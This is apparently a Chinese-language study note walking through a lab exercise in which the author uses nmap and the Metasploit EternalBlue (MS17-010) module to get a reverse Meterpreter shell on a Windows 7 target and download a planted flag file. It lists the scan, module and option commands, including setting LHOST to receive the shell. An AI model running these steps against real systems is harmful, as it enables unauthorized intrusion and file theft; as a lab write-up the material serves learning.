MS17_010漏洞利用，渗透win7，拿到桌面的flag

关于使用MS17_010来攻击WIN7：

我们先ping一下win7的ip看看是否可以ping通（ping不通的可以关闭win7的防火墙），然后我们用nmap扫一下看看靶机有什么漏洞

nmap --script=vuln 靶机IP

扫完后我们可以发现存在MS17_010漏洞

进入msfconsole，并搜索这个漏洞：

其中前2个插件是auxiliary目录下的，属于辅助验证程序。

2到4是exploit目录下的，这才是我们重点研究的对象。（第3个在本章暂且用不上）

 

这里就拿auxiliary/scanner/smb/smb_ms17_010这个扫描插件来测试。

这个插件的作用是扫描可能含有ms17-010漏洞的服务器。

我们给他一个靶机的地址。

然后我们在show optinos查看配置是否成功。

然后运行。

 

我们在进入 exploit/windows/smb/ms17_010_eternalblue 进行攻击

配置好目标靶机以后，我们就运行一下就行了，之后我们会进入到meterprter

设置目标攻击ip

      set rhosts IP (如果有多个攻击目标ip间直接用空格隔开就行)

设置用于接收从目标机弹回来的shell

    set  LHOST 攻击机的IP

执行攻击

      run

然后我们进入靶机的shell

发现有乱码，我们可以输入 输入 chcp 65001（转utf-8代码页）就可以了。

我在靶机的桌面上建立了一个flag.txt的文件，我们需要进入桌面然后拿到这个文件，并放在自己的攻击机上。

我们在进入到桌面，并用dir命令将桌面上全部的文件展示出来

我们发现了那个flag.txt文件，然后我们用download + 文件的路径 下载到自己的kali上就OK了。

然后放到桌面上就可以直接访问了

以上是我今天进行MS17_010漏洞的学习笔记，以及如何渗透到win7并且拿到flag。